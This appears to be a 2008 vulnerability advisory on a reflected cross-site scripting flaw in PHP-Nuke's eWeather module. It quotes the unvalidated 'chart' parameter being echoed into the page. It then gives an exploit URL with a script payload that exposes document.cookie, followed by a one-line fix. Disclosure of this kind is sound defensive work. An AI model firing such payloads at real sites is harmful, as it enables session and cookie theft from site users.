Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Directory traversal in EdiorCMS V3.0

Powered by phpBB 2001, 2006 (SQL)

travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

uberghey cms 0.3.1 multiple local file inclusion vulnerabilities

From:	nima_501_(at)_yahoo.com <nima_501_(at)_yahoo.com>
Date:	13.03.2008
Subject:	XSS in PHP-Nuke (eWeather module)

//////////XSS in PHP-Nuke (eWeather module)

PHP-Nuke (http://phpnuke.org):

       PHP-Nuke is a news automated system specially designed to be used in
Intranets and Internet. The Administrator has total control of his web site,
registered users, and he will have in the hand a powerful assembly of tools
to maintain an active and 100% interactive web site using databases.

eWeather module (http://www.janitorialservice.us):

       Weather module based on eWeather.biz data with 3 additional blocks
2 side and one center block.

///Details

From source-code of /modules/eWeather/index.php

Line 35: $zipCode=$chart;

Line 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";

"chart" variable is unvalidated.

///Exploit
http://example.net/modules.php?name=eWeather&chart=[XSS]
http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(
document.cookie)%3C/script%3E

///Fix
Change line 35 to "$zipCode=(int)$chart;"

///Author:
NetJackal

http://netjackal.by.ru
http://hackerz.ir